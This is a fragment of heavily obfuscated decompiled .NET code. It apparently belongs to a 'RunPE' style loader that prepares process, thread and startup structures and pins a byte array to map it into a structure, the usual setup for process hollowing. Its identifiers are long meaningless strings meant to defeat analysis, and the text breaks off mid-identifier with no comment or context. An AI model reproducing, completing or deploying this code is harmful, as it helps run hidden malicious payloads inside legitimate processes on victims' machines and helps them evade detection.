WJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU();
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmm info = new rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmm();
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmm startup = new rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmm();
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmm process1 = new rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmm();
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmm thread = new rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmm();
|
|
||||||
object Instance1 = (object) GCHandle.Alloc((object) JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUvz, GCHandleType.Pinned);
|
|
||||||
int integer = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance1, (System.Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null), (System.Type) null, "ToInt32", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null));
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmmm hkujkrwesffdssfoueowdUmmmmmm1 = new rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmmm();
|
|
||||||
System.Type Type = typeof (Marshal);
|
|
||||||
object[] objArray1 = new object[2];
|
|
||||||
object[] objArray2 = objArray1;
|
|
||||||
object Instance2 = Instance1;
|
|
||||||
object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance2, (System.Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null));
|
|
||||||
objArray2[0] = objectValue;
|
|
||||||
objArray1[1] = (object) hkujkrwesffdssfoueowdUmmmmmm1.GetType();
|
|
||||||
object[] objArray3 = objArray1;
|
|
||||||
object[] Arguments = objArray3;
|
|
||||||
bool[] flagArray = new bool[2]{ true, false };
|
|
||||||
bool[] CopyBack = flagArray;
|
|
||||||
object obj = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (System.Type[]) null, CopyBack);
|
|
||||||
if (flagArray[0])
|
|
||||||
NewLateBinding.LateSetComplex(Instance2, (System.Type) null, "AddrOfPinnedObject", new object[1]
|
|
||||||
{
|
|
||||||
RuntimeHelpers.GetObjectValue(objArray3[0])
|
|
||||||
}, (string[]) null, (System.Type[]) null, true, false);
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmmm hkujkrwesffdssfoueowdUmmmmmm2;
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFS